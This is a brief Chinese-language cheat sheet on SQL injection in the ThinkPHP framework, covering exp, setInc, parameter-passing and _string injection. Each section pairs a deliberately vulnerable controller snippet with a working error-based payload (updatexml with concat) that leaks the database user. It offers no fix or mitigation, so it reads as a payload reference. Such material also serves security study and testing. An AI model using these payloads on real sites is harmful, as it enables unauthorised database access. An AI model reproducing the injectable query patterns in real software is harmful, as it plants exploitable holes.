exp注入
一、EXP注入
1、语句
public function index(){
$map = array();
$map['id'] = $_GET['id'];
$data = M('User')->where($map)->find();
dump($data);
}
2、报错注入
?id[0]=exp&id[1]==1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1))#
二、setInc注入
1、语句
public function index(){
$User = M('User');
$User->where('id=1')->setInc('score',I('num'));
}
2、报错语句
5 WHERE ( id=1 ) and (updatexml(1,concat(0x7e,(select user()),0x7e),1))#
三、参数传递注入
1、语句
public function index($id){
if(intval($id) > 0){
$date = M('User')->where('id='.$id)->select();
dump($date);
}
}
SELECT * FROM `thinkphp_user` WHERE ( id=1 )
2、报错语句
) and (updatexml(1,concat(0x7e,(select user()),0x7e),1))#
四、_string注入
1、语句
public function index(){
$User = M("User"); // 实例化User对象
$map['id'] = array('neq',1);
$map['username'] = 'ok';
$map['_string'] = 'score='.I('score');
$User->where($map)->select();
}
2、报错语句
and (updatexml(1,concat(0x7e,(select user()),0x7e),1))#